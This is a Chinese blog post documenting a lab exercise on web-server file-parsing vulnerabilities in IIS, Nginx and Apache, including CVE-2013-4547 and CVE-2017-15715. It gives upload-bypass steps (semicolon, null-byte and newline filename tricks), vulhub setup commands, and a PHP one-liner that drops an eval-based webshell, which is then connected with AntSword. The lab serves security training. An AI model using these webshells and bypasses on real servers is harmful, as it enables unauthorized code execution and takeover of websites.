文件解析漏洞靶场

最新推荐文章于 2025-05-27 20:24:24 发布
最新推荐文章于 2025-05-27 20:24:24 发布
阅读量1.5k 收藏 16
点赞数 23
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2403_87610673/article/details/146234651
版权

IIS

iis6.x 目录解析

在网站根目录建一个名为a.asp的文件

在a.asp中建一个jpg文件内容为<%=now()%> asp代码

在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执行

在新建一个2.jpg文件放在a.asp同级目录下再次打开,发现没有被解析,由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏.

畸形文件解析

在IIS 6 处理⽂件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是 shell.asp。另外IIS6.0默认的可执⾏⽂件除了asp还包含 asa\cer\cdx

iis7.x

环境搭建

在Windows Server 2008R2中安装IIS后在安装PHPstudy for IIS....

步骤⼆:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启.

IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

利用

在根目录创建一个1.jpg内容为木马,打开发现没有被解析

在后面输入x.php就能解析执行了

Nginx

首先在docker中开启环境

cd /nginx/nginx_parsing_vulnerability

docker-compose build

docker-compose up -d

docker ps

制作图片🐎并上传

访问上传路径,没被解析后面输入/.php文件

解析

蚁剑连接

CVE-2013-4547

启动环境

上传一个1.php内容为一句话木马  被拦截抓包修改

php修改为jpg并且加一个空格  就可以上传成功了

在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 修改为如下即 0x20 0x00 进⾏发包...

访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 为 0x20 0x00

由于⽊⻢地址编码问题,⼯具连不到 可以使⽤以下的php代码输出⼀句话⽊⻢到当前⽬录

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

Apache

启动环境

cd /vulhub/httpd/apache_parsing_vulnerability

docker-compose up -d

docker ps

上传2.php.jpg文件内容为

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

拼接路径,解析了

访问⽣成的shell.php并执⾏命令,执⾏成功。

蚁剑测试连接成功

CVE-2017-15715

启动环境

上传木马被拦截

在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功

访问上传的evil⽂件在后⾯加上 %0a 再访问发现解析了其中的PHP代码,但后缀不是php说明 存在解析漏洞

蚁剑连接

shi202
关注
文件解析漏洞——封神台漏洞靶场
m0_51442886的博客
06-09 1239
本文章禁止转发,如有雷同,后果自负
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1791
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
文件解析漏洞靶场解析全集详解
gysadsadsa的博客
03-13 1039
方式一:目录解析(在IIS6.x中,.asp文件夹中的任意文件会被当作asp文件去执行)1.在IIS的网站根目录创建一个名为x.asp的文件2.在x.asp文件夹中创建一个1.txt,里面内容为3.在外部浏览器进行访问方式二:畸形⽂件解析在IIS 6 处理⽂件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是 shell.asp。另外IIS6.0默认的可执⾏⽂件除了asp还包含 asa\cer\cdx。
文件解析漏洞靶场攻略
2401_88387979的博客
12-22 979
在I1S7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。由此可见.asp文件夹中的任意文件会被当做asp文件去执行。这样就可以看到这一关的端口号为:8080,浏览器访问 :8.155.6.37:8080 就能进入这一关。本关继续使用之前的方法上传文件,发现被拦截,不可行,尝试抓包,修改文件类型。在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。
文件解析漏洞靶场实战
weixin_59044290的博客
12-22 569
安装windows2003和IIS6.X环境,进入inetpub/wwwroot目录下,创建一个.asp后缀的文件。修改网址中的.jpg后缀,然后抓包,修改里面的第二个”20“改为”00“,操作同上一步,访问蚁剑。进行抓包,在burpsuite中的evil.php中添加空格,修改Hex里的”20“改为”0a“burpsuite上传文件进行抓包,在burpsuite里修改文件后缀名。创建一个shell.php文件,写入一句话木马,使用蚁剑访问网址。创建一个后缀为.jpg的文件,写入一句话,显示当前时间。
文件解析漏洞靶场---解析详解
qq_65379983的博客
03-13 952
文件解析漏洞 让你防不胜防的文件解析
文件解析漏洞靶场通关合集
m0_66808441的博客
03-13 1696
00起到截断作用,服务器认为是允许的jpg文件,但中间件认为00是文件名的一部分。上传的文件名为phpinfo.jpg0x200x00.php。被服务器看成是1.asp。
文件解析漏洞靶场集锦详解
2301_81383433的博客
03-13 1625
2. 抓包上传.jpg文件,在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 0x20 修改为0x20 0x00 进⾏发包,上传成功。这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg 后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。
文件上传靶场-Nginx文件解析漏洞
ierciyuan的博客
11-04 1846
一个简单的nginx文件解析漏洞靶场。配置疏忽导致文件上传漏洞产生。
文件上传漏洞靶场
qq_45079558的博客
09-01 1505
本关查看源码,发现文件上传后会在临时目录下,检测出不符合规则直接删除,但是上传和删除之间有一点点的间隔,我们可以在这个间隔中搞点事情,例如将上传的.php文件修改成可以写一句话木马的脚本,只要在间隔中打开文件,它就会生成一个木马文件,系统只会判断上传的文件,不会判断生成出的文件。这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。上传图片马失败,发现本关会删掉图片内多余的内容,图片马没有用,只能使用反二次渲染的图片。这里还是将前一关的代码插入图片作出图片马。
文件解析漏洞
weixin_71053667的博客
07-30 1138
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将 **/xx.jpg/xx.php** 解析为 php 文件。也就是说 1.asp;那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。
文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3661
(1)第一种:未知扩展名解析漏洞 Apache对文件解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
upload-labs漏洞靶场~文件上传漏洞
weixin_67832625的博客
07-31 836
寻找测试网站的文件上传的模块,常见:头像上传,修改上传,文件编辑器中文件上传,图片上传、媒体上传等,通过抓包上传恶意的文件进行测试,上传后缀名 asp php aspx 等的动态语言脚本,查看上传时的返回信息,判断是否能直接上传,如果不能直接上传,再进行测试上传突破,例如上传文件的时候只允许图片格式的后缀,但是修改文件时,却没有限制后缀名,图片文件可以修改成动态语言格式如php,则可能访问这个文件的 URL 直接 getshell,可以控制网站;
文件上传漏洞:pikachu靶场中的文件上传漏洞通关
qq_68163788的博客
05-28 3371
文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。
HTTPS 协议:数据传输安全的坚实堡垒
最新发布
ruanjiananquan99的博客
05-27 514
在互联网技术飞速发展的今天,数据在网络中的传输无处不在。从日常浏览网页、在线购物,到企业间的数据交互,每一次信息传递都关乎着用户隐私、企业利益和网络安全。HTTP 协议作为互联网应用层的基础协议,曾经承担着数据传输的重任,但随着网络安全威胁的日益严峻,其不加密、易被窃取篡改的弊端逐渐暴露。而 HTTPS 协议在 HTTP 的基础上增加了 SSL/TLS 加密层,犹如为数据传输穿上了坚固的铠甲,能够对数据进行加密传输,确保数据在传输过程中的保密性、完整性和真实性,成为了保障网络安全的关键技术。​。
LlamaFirewall:开源框架助力检测与缓解AI核心安全风险
FreeBuf_的博客
05-26 649
LlamaFirewall 是一款面向大语言模型(LLM)应用的系统级安全框架,采用模块化设计支持分层自适应防御。该框架旨在缓解各类AI代理安全风险,包括越狱攻击(jailbreaking)、间接提示注入(indirect prompt injection)、目标劫持(goal hijacking)以及不安全代码输出等问题。
“智”造巨轮启新程:数字安全的战略布局
Scgute88的博客
05-23 571
在数字化转型的浪潮中,某大型智能家电企业通过与天空卫士的合作,构建了一套全面的数据安全防护体系。该体系包括统一内容管理平台、邮件防泄露系统、网络防泄露系统和应用防泄露系统,确保数据在传输、存储和处理的每个环节都得到有效保护。这一智能化的安全解决方案不仅提升了企业的数据安全水平,还增强了员工的安全意识,为业务创新提供了坚实保障。企业的成功实践表明,数据安全是数字化转型的重要助推器,持续的安全投入和创新是企业在数字化时代稳健前行的关键。
安全生产例题
liangjiao_shou的博客
05-27 306
安全生产例题
文件包含漏洞靶场
03-26
- 支持本地文件包含漏洞测试,通过包含非PHP文件(如`.txt`)验证解析漏洞。例如: ```http http://靶场地址/fileinclude/1.php?file=../../test.txt ``` - 重点练习绕过路径限制的方法(如`../`遍历)[^2]。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值